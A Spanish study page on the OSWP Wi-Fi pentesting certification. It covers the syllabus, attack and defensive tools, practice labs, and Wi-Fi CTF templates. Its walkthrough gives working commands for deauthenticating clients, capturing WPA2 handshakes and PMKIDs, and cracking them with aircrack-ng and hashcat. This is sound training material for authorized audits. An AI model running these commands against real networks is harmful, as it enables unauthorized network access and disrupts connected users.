ciberseguridad
OSWP
Visión general
- Offensive Security Wireless Professional (OSWP) es una certificación centrada en pentesting de redes Wi-Fi bajo escenarios reales.
- Forma parte del ecosistema de Pentesting de Offensive Security.
- Evalúa la capacidad de auditar, atacar y comprometer redes inalámbricas utilizando técnicas prácticas y herramientas estándar del sector.
- Se enfoca principalmente en WEP, WPA/WPA2-PSK y WPA/WPA2-Enterprise.
Objetivo de la certificación
- Demostrar conocimientos prácticos en:
- Identificación de redes inalámbricas.
- Captura y análisis de tráfico Wi-Fi.
- Ataques contra mecanismos de autenticación y cifrado.
- Obtención de credenciales y acceso a la red.
- Preparar al candidato para auditorías Wi-Fi reales en entornos corporativos.
Alcance técnico evaluado
Fundamentos de redes inalámbricas
- Estándares IEEE 802.11 (a/b/g/n/ac).
- Canales, frecuencias y solapamiento.
- Modos de operación:
- Managed
- Monitor
- Master (AP)
- Tipos de autenticación:
- Open
- PSK
- Enterprise (802.1X)
Seguridad Wi-Fi
- WEP:
- Debilidades criptográficas.
- Recolección de IVs.
- Crackeo mediante ataques estadísticos.
- WPA/WPA2-PSK:
- Handshake de 4 vías.
- Ataques de diccionario y fuerza bruta.
- PMKID attack.
- WPA/WPA2-Enterprise:
- EAP (PEAP, TTLS).
- Rogue AP.
- Captura de credenciales.
- Ataques de downgrade.
Técnicas de ataque
Reconocimiento inalámbrico
- Enumeración de:
- ESSID
- BSSID
- Clientes conectados
- Tipo de cifrado
- Identificación de objetivos vulnerables.
- Análisis de potencia de señal y cobertura.
Ataques activos
- Deauthentication.
- Fake authentication.
- Association attacks.
- Evil Twin.
- Captive Portal malicioso.
Ataques pasivos
- Sniffing de tráfico Wi-Fi.
- Captura de handshakes.
- Análisis offline de credenciales.
Herramientas principales
Aircrack-ng suite
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
Herramientas adicionales
- Reaver / Bully (WPS).
- hcxdumptool / hcxpcapngtool.
- Hashcat.
- Wireshark.
- hostapd-wpe.
Metodología de examen
- Examen 100% práctico.
- Acceso a un laboratorio remoto con:
- Varias redes Wi-Fi objetivo.
- Diferentes esquemas de seguridad.
- Objetivo principal:
- Obtener credenciales válidas y demostrar acceso.
- Entrega de un informe técnico con:
- Metodología.
- Evidencias.
- Resultados.
Preparación recomendada
Conocimientos previos
- Linux básico/intermedio.
- Redes TCP/IP.
- Criptografía básica.
- Uso de terminal y scripting simple.
Recursos de estudio
- Preparación OSWP.md · GitHub
- Documentación oficial de Offensive Security.
- Laboratorios prácticos de Wi-Fi.
- Práctica con adaptadores compatibles con modo monitor e inyección.
Hardware recomendado
- Adaptador Wi-Fi compatible con:
- Modo monitor.
- Inyección de paquetes.
- Chipsets comunes:
- Atheros
- Ralink
- Realtek (modelos específicos)
Relación con otras certificaciones
- Complementaria a:
- Especializada exclusivamente en seguridad inalámbrica, a diferencia de certificaciones de pentesting general.
Salidas profesionales
- Pentester.
- Consultor de seguridad Wi-Fi.
- Auditor de redes inalámbricas.
- Red Team con foco en acceso inicial vía Wi-Fi.
OSWP — Expansión avanzada
Temas no cubiertos explícitamente en el temario base
- Aspectos operativos y defensivos derivados del ataque Wi-Fi.
- Limitaciones reales de ataques inalámbricos.
- Contramedidas y detección.
- Detalles avanzados de 802.11 y EAP.
- Errores comunes en auditorías Wi-Fi.
- Reporting orientado a clientes y Blue Team.
Profundización en 802.11
Tramas Wi-Fi
- Management frames:
- Beacon
- Probe Request / Response
- Authentication
- Association
- Control frames:
- RTS / CTS
- ACK
- Data frames:
- Tráfico cifrado y sin cifrar.
- Importancia de cada trama en ataques y detección.
Protecciones modernas
- 802.11w (Protected Management Frames):
- Impacto en ataques de deauth.
- Bypass parciales y limitaciones.
- WPA3:
- SAE (Simultaneous Authentication of Equals).
- Diferencias prácticas frente a WPA2.
- Ataques aún viables (downgrade, configuración débil).
WPA3 y escenarios mixtos
- Redes WPA2/WPA3 Transition Mode:
- Riesgos de downgrade.
- Ataques heredados aún aplicables.
- Limitaciones prácticas de WPA3 en auditorías OSWP.
WPS en profundidad
Funcionamiento interno
- PIN dividido en dos mitades.
- Validación parcial.
- Ataques online vs offline.
Condiciones reales de explotación
- Rate limiting.
- Lockout.
- Falsos positivos en herramientas automáticas.
Ataques avanzados contra WPA-Enterprise
EAP en detalle
- PEAP:
- Tunel TLS.
- Autenticación MSCHAPv2.
- TTLS:
- Mayor superficie de ataque.
- EAP-TLS:
- Uso de certificados.
- Por qué es resistente a ataques Evil Twin.
Certificados y errores comunes
- Usuarios que aceptan certificados no confiables.
- Configuraciones sin validación de CA.
- Impacto real en compromiso de dominios.
Hostapd-WPE avanzado
Configuración realista
- Simulación de SSID corporativo.
- Clonado de parámetros:
- Canal
- Seguridad
- Vendor IE
- Evitar detección temprana.
Post-explotación
- Uso de credenciales capturadas:
- Acceso VPN.
- Acceso a red interna.
- Movimiento lateral inicial.
Análisis de tráfico Wi-Fi
Wireshark avanzado
- Filtros específicos 802.11.
- Identificación de:
- Handshakes incompletos.
- Reintentos.
- Problemas de calidad de señal.
- Correlación de clientes y APs.
Hashcat aplicado a Wi-Fi
Estrategias de cracking
- Selección de diccionarios.
- Reglas (rules).
- Ataques híbridos.
- Máscaras dirigidas por patrones reales.
Optimización
- Selección de hash mode correcto.
- GPU vs CPU.
- Evitar falsos negativos.
Limitaciones reales de los ataques
- Distancia y potencia.
- Ruido y saturación de canales.
- Dispositivos con roaming agresivo.
- APs con mitigaciones activas.
Detección y Blue Team
Indicadores de ataque
- Picos de deauth.
- APs duplicados.
- Handshakes repetidos.
- Cambios de canal inesperados.
Herramientas defensivas
- WIDS / WIPS.
- Logs de controladoras Wi-Fi.
- Correlación con SIEM.
Errores comunes en el examen OSWP
- No validar correctamente el tipo de seguridad.
- Perder tiempo atacando WPS inexistente.
- No guardar evidencias correctamente.
- Crackear hashes incorrectos.
- No documentar cada paso.
Gestión del tiempo en el examen
- Priorizar redes más débiles.
- Automatizar tareas repetitivas.
- Atacar en paralelo:
- Captura
- Crackeo
- Análisis
Evidencias y reporting
Evidencias mínimas esperadas
- Capturas de pantalla.
- Handshakes válidos.
- Credenciales obtenidas.
- Acceso exitoso a la red.
Enfoque profesional
- Impacto de negocio.
- Riesgo real.
- Recomendaciones claras:
- WPA3-Enterprise.
- Validación estricta de certificados.
- Deshabilitar WPS.
Relación con escenarios reales de Red Team
- OSWP como vector de acceso inicial.
- Wi-Fi como bypass de perímetro.
- Ataques físicos y de proximidad.
- Persistencia a través de credenciales inalámbricas.
Conexión con otras áreas
- Integración con:
- Pentesting
- Active Directory.
- Red Team.
- Puente natural hacia ataques internos tras acceso Wi-Fi.
Recursos y herramientas para Pentesting Wi-Fi (2025)
Suites y Frameworks de Auditoría Wi-Fi
- Aircrack-ng — Suite clásica para captura de paquetes, inyección, ataques y recuperación de claves WEP/WPA/WPA2. Muy utilizada y soportada en distros pentest como Kali Linux o Parrot.
Aircrack-ng - Kismet — Detector de redes, sniffer y sistema de detección de intrusiones Wi-Fi; trabaja pasivamente y puede exportar capturas para análisis con Wireshark.
Kismet Wireless - Wifite — Herramienta de automatización de ataques Wi-Fi (WEP/WPA/WPS), útil para auditorías repetibles sin configuración compleja.
Wifite GitHub - Reaver — Fuerza bruta PIN de WPS para recuperar claves WPA/WPA2 en dispositivos vulnerables.
Reaver GitHub - Fern WiFi Cracker Pro — Interfaz gráfica con reporte automático y múltiples técnicas de ataque.
Fern WiFi Cracker - Bettercap 3.0 — Framework multidisciplinar que combina sniffing, spoofing y ataques MITM, puede usarse en entornos inalámbricos.
Bettercap - airgeddon — Script que agrega múltiples ataques Wi-Fi en una interfaz semi-automática, ampliamente usado en auditorías modernas.
airgeddon GitHub
Análisis y Sniffing
- Wireshark — Analizador de protocolos universal, ideal para examinar tráfico 802.11 y filtrar tramas específicas capturadas.
Wireshark - PacketSafari — Plataforma colaborativa en la nube para análisis de paquetes y resultados en tiempo real.
PacketSafari
Automatización, Ingeniería Social y Rogue AP
- Wifiphisher — Herramienta para crear puntos de acceso falsos y capturar credenciales mediante phishing.
Wifiphisher GitHub - RogueAccess — Automatización de Evil Twin y ataques de asociación.
RogueAccess GitHub - Hak5 WiFi Pineapple Mk8 — Dispositivo dedicado con múltiples módulos para ataques sociales y de red inalámbrica.
WiFi Pineapple
Cracking & Password Recovery
- Hashcat — Cracker de contraseñas GPU-acelerado, estándar de facto para cracking de handshakes y PMKID.
Hashcat - John the Ripper — Cracker de hashes multi-protocolo, complemento en ataques offline.
John the Ripper - hcxdumptool / hcxpcapngtool — Captura avanzada de handshakes y PMKID, enfoque moderno frente a Aircrack-ng.
hcxTools GitHub
Dispositivos y Plataformas
- Kali NetHunter — Plataforma móvil basada en Kali Linux para ejecutar auditorías Wi-Fi desde Android.
Kali NetHunter - ESP32 / Raspberry Pi (proyectos DIY) — Plataformas usadas en herramientas como:
- ESP32 Marauder
ESP32 Marauder - P4wnP1 A.L.O.A.
P4wnP1 GitHub - WiFi Nugget
WiFi Nugget
- ESP32 Marauder
Bases de Datos y Recursos Externos
- WiGLE — Repositorio global de redes Wi-Fi para reconocimiento pasivo y correlación geográfica.
WiGLE - Red Teamer’s Guide to Wi-Fi Exploits — Documento técnico con técnicas modernas de explotación Wi-Fi.
Red Teamer’s Guide to Wi-Fi Exploits
Integración con Reporting y Gestión
- Dradis Framework — Plataforma colaborativa para consolidar evidencias y generar informes profesionales.
Dradis Framework
Bibliotecas y Soporte de Redes
- wpa_supplicant — Implementación base de WPA/WPA2/WPA3 usada para testing avanzado de autenticación.
wpa_supplicant
Cursos, Guías y Documentación
- Preparación OSWP — Guía práctica de estudio y laboratorio.
Preparación OSWP.md · GitHub - Documentación oficial Offensive Security — Referencia para enfoque de examen y metodología.
Offensive Security - Comunidades técnicas:
- Reddit r/netsec
https://www.reddit.com/r/netsec/ - Reddit r/pentesting
https://www.reddit.com/r/pentesting/
- Reddit r/netsec
Consejos prácticos 2025
- Priorizar PMKID y ataques offline sobre fuerza bruta online.
- Automatizar fases repetitivas con airgeddon o Wifite.
- Enfocar auditorías modernas en errores de configuración más que en debilidades criptográficas puras.
- Considerar siempre WPA3, 802.11w y EAP-TLS como baseline defensivo.
Temario completo de OSWP — PEN-210 Wireless Attacks
1. Fundamentos de Wi-Fi y 802.11
- IEEE 802.11: estándares y características principales. NICCS
- Arquitectura de redes inalámbricas (infraestructura, ad-hoc). EFIGO
- Tipos de tramas: management, control y datos. EFIGO
2. Redes inalámbricas y conceptos básicos
- Funcionamiento de redes WLAN. EFIGO
- Interacción de paquetes y datos en Wi-Fi. NICCS
- Modos y configuración del hardware inalámbrico en Linux. EFIGO
3. Wi-Fi Encryption (Criptografía inalámbrica)
- Seguridad WEP: cómo funciona y por qué es vulnerable. NICCS
- WPA / WPA2 PSK: handshake de 4 vías, captura y craqueo. NICCS
- Conceptos de WPA Enterprise (introducción a ataques). Pranqster’s Lair
4. Herramientas de Linux Wireless, Drivers y Stack
5. Wireshark Essentials
- Análisis de tráfico 802.11 con Wireshark: filtros, tramas y flujos. EFIGO
6. Aircrack-ng Essentials
- Uso de airmon-ng, airodump-ng, aireplay-ng y aircrack-ng. NICCS
- Captura y análisis de handshakes. NICCS
7. Ataques contra autenticaciones
- Cracking de hashes de autenticación WPA / WPA2 PSK. EFIGO
- WEP cracking con clientes conectados y sin clientes. NICCS
8. Ataques WPS
- Explotación de Wi-Fi Protected Setup (WPS). EFIGO
9. Rogue Access Points
- Creación y explotación de APs falsos (Evil Twin). NICCS
10. Atacando WPA Enterprise
- Técnicas y escenarios para comprometer redes WPA Enterprise. Pranqster’s Lair
11. Portales cautivos (Captive Portals)
- Explotación y bypass de captive portals. Pranqster’s Lair
12. Herramientas adicionales y módulos
- Bettercap Essentials para ataques de MITM en entornos Wi-Fi. Pranqster’s Lair
- Kismet Essentials para reconocimiento pasivo avanzado. Pranqster’s Lair
- Determinar chipsets y drivers específicos para pentesting. Pranqster’s Lair
- Manual network connections y tácticas avanzadas. Pranqster’s Lair
Resumen en estructura de módulos
- IEEE 802.11 y fundamentos
- Redes inalámbricas y topologías
- Criptografía Wi-Fi (WEP/WPA/WPA2)
- Linux Wireless Stack / drivers
- Wireshark para Wi-Fi
- Aircrack-ng y herramientas relacionadas
- Cracking de autenticaciones
- Ataques WPS
- Rogue AP / Evil Twin
- WPA Enterprise
- Captive Portals
- Bettercap / Kismet / módulos avanzados
📌 Listado de laboratorios / entornos de práctica Wi-Fi
1. WiFiChallenge Lab
Entorno totalmente virtualizado para practicar ataques contra diferentes tipos de redes Wi-Fi (OPN, WEP, WPA2, WPA3, Enterprise) sin necesidad de tarjetas Wi-Fi físicas. La comunicación Wi-Fi se emula con mac80211_hwsim.
👉 https://lab.wifichallenge.com/ (lab.wifichallenge.com)
También puedes encontrar el repositorio de la versión Docker para montar tu propio laboratorio:
👉 https://github.com/r4ulcl/WiFiChallengeLab-docker (GitHub)
2. HTB Academy – Wi-Fi Penetration Testing Basics
Módulo educativo en Hack The Box Academy con ejercicios estructurados que cubren enumeración, ataques WEP, bypass MAC, ocultar SSID, etc.
👉 https://academy.hackthebox.com/course/preview/wi-fi-penetration-testing-basics (academy.hackthebox.com)
3. TryHackMe Wi-Fi Challenges / Labs
Plataforma con varios laboratorios prácticos y guiados sobre Wi-Fi hacking y análisis de WPA/WPA2/WPA3 (accesos hardware o simulados).
4. Laboratorios personales con máquinas virtuales
Puedes crear tu propio laboratorio casero con VMs de:
- Kali Linux como atacante
- Router / AP virtual (hostapd o contenedores mac80211_hwsim)
Esto te permitirá practicar ataques sin riesgo a terceros.
🧪 Laboratorio desarrollado: WiFiChallenge – Cracking WPA2-PSK
Este es un ejemplo práctico típico que puedes realizar con WiFiChallenge Lab o un entorno similar (Docker/mac80211_hwsim).
🎯 Objetivo
Auditar una red WPA2-PSK, capturar el handshake y crackearlo offline con diccionarios.
🧰 Requisitos previos
- Kali Linux (VM / live)
- Interfaz en modo monitor (monitor mode)
- Herramientas:
airmon-ng,airodump-ng,aireplay-ng,aircrack-ng
(Esta suite está incluida en Kali y otras distros pentesting) (Wikipedia)
🏁 1. Preparar el entorno Wi-Fi
a) Levantar la interfaz en modo monitor
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Esto mata procesos que interfieren y pone la tarjeta en modo monitor (captura pasiva). (Wikipedia)
Verifica interfaces:
sudo iwconfig
🔍 2. Enumerar redes
Ejecuta:
sudo airodump-ng wlan0mon
Verás una lista de APs (ESSID), BSSID, canales y clientes.
Apunta el BSSID y canal (CH) de tu objetivo.
📥 3. Capturar el handshake WPA2
En una nueva terminal:
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w captura wlan0mon
Reemplaza AA:BB:CC:DD:EE:FF con el BSSID de tu objetivo y canal 6 con el canal correcto.
Esto guarda el tráfico en captura-01.cap.
🔄 4. Forzar re-autenticación del cliente
Si hay clientes conectados, puedes enviar deauth para capturar handshake:
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Cada vez que un cliente se reconecta, se captura el handshake.
🧠 5. Verificar handshake
aircrack-ng captura-01.cap
Verifica que haya handshake válido en el fichero.
🗝️ 6. Crackear offline el PSK
Usando un diccionario (por ejemplo rockyou):
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
Si la contraseña está en el diccionario, será encontrada.
🧠 7. Alternativa: Ataque PMKID
Algunas veces puedes capturar PMKID sin esperar al handshake:
sudo hcxdumptool -i wlan0mon -o pmkid.pcap --enable_status=1
Después, convierte para hashcat y crackeo GPU:
hcxpcapngtool -o pmkid.hccapx pmkid.pcap
hashcat -m 2500 pmkid.hccapx rockyou.txt
Esto es muy útil en laboratorio. (Requiere soporte de herramientas hcxdumptool/hcxpcapngtool y GPU).
🧪 8. Observaciones y buenas prácticas
- Si no hay clientes conectados, el deauth facilita handshake.
- WPA3 normalmente no puede ser crackeado con métodos clásicos.
- En laboratorio WiFiChallenge Lab, hay múltiples redes y retos listos para practicar. (lab.wifichallenge.com)
📝 Recomendaciones de laboratorios
| Laboratorio | Tipo | Comentarios |
|---|---|---|
| WiFiChallenge Lab | Virtual | Sin hardware físico + retos WEP/WPA2/WPA3/Enterprise (lab.wifichallenge.com) |
| HTB Academy Wi-Fi | En línea | Módulos guiados paso a paso (academy.hackthebox.com) |
| TryHackMe Wi-Fi | En línea | Guiado interactivo |
Plantillas de ejercicios Wi-Fi (CTF / Labs)
Plantilla general de laboratorio
Contexto
- Tipo de red:
- Entorno:
- Restricciones:
- Objetivo final:
Información inicial
- ESSID:
- BSSID:
- Canal:
- Seguridad:
- Clientes conocidos:
Reglas
- Ataques permitidos:
- Ataques no permitidos:
- Evidencias requeridas:
Entregables
- Credencial obtenida:
- Prueba de acceso:
- Capturas:
- Explicación técnica breve:
CTF 01 — Open Network + Sniffing
Contexto
- Red Wi-Fi abierta usada por invitados.
- No existe autenticación.
Objetivo
- Capturar tráfico sensible en claro.
- Identificar credenciales o información útil.
Pistas
- Tráfico HTTP sin cifrar.
- DNS y requests visibles.
Flags
flag{usuario_password}flag{cookie_session}
Técnicas esperadas
- Modo monitor.
- Sniffing pasivo.
- Análisis 802.11 Data Frames.
CTF 02 — WEP Legacy
Contexto
- Red antigua aún usando WEP.
Objetivo
- Obtener la clave WEP.
Pistas
- Poco tráfico inicial.
- Clientes intermitentes.
Flags
flag{wep_key}
Técnicas esperadas
- Inyección ARP.
- Recolección de IVs.
- Ataque estadístico.
CTF 03 — WPA2-PSK Handshake
Contexto
- Red doméstica WPA2-PSK.
Objetivo
- Obtener la contraseña Wi-Fi.
Pistas
- Un cliente conectado.
- Contraseña débil.
Flags
flag{wpa2_password}
Técnicas esperadas
- Captura de handshake.
- Deauthentication.
- Ataque offline con diccionario.
CTF 04 — WPA2-PSK PMKID
Contexto
- Router moderno con PMKID habilitado.
Objetivo
- Obtener el PSK sin clientes conectados.
Pistas
- AP responde a PMKID.
- No hay tráfico visible.
Flags
flag{pmkid_password}
Técnicas esperadas
- PMKID capture.
- Conversión a hash.
- Cracking GPU.
CTF 05 — WPS PIN Attack
Contexto
- Red WPA2 con WPS habilitado.
Objetivo
- Obtener la clave WPA usando WPS.
Pistas
- WPS activo.
- Sin lockout inicial.
Flags
flag{wps_pin}flag{wpa_key}
Técnicas esperadas
- Fuerza bruta PIN.
- Enumeración WPS.
- Reaver / Bully.
CTF 06 — Hidden SSID
Contexto
- Red con ESSID oculto.
Objetivo
- Identificar ESSID y obtener acceso.
Pistas
- BSSID visible.
- Clientes conectados.
Flags
flag{hidden_ssid}flag{wifi_key}
Técnicas esperadas
- Captura de association.
- Deauth selectivo.
- Reconstrucción ESSID.
CTF 07 — Evil Twin WPA2-Enterprise
Contexto
- Red corporativa WPA2-Enterprise.
Objetivo
- Capturar credenciales válidas.
Pistas
- Usuarios no validan certificados.
- PEAP/MSCHAPv2.
Flags
flag{username}flag{ntlm_hash}
Técnicas esperadas
- Rogue AP.
- hostapd-wpe.
- Captura de credenciales.
CTF 08 — WPA2-Enterprise Secure
Contexto
- Red WPA2-Enterprise bien configurada.
Objetivo
- Demostrar por qué no es vulnerable.
Pistas
- EAP-TLS.
- Certificados válidos.
Flags
flag{secure_configuration}
Técnicas esperadas
- Análisis.
- Justificación técnica.
- No explotación.
CTF 09 — Captive Portal
Contexto
- Red con portal cautivo.
Objetivo
- Bypass del portal o captura de credenciales.
Pistas
- Portal HTTP.
- DNS spoofing posible.
Flags
flag{portal_bypass}flag{captured_credentials}
Técnicas esperadas
- MITM.
- DNS spoofing.
- Phishing.
CTF 10 — Red Realista OSWP
Contexto
- Múltiples APs.
- Seguridad mixta.
Objetivo
- Obtener acceso válido a cualquier red.
Pistas
- Priorizar redes débiles.
- Tiempo limitado.
Flags
flag{initial_access}flag{wifi_compromise}
Técnicas esperadas
- Enumeración completa.
- Selección de ataque óptima.
- Gestión del tiempo.
Plantilla de flag
- Formato:
flag{texto_descriptivo}
- Ejemplos:
flag{wpa2_psk_found}flag{enterprise_hash_captured}
Criterios de evaluación
- Metodología correcta.
- Evidencias válidas.
- Uso adecuado de herramientas.
- Explicación técnica clara.
¿Te gusta este contenido? Suscríbete vía RSS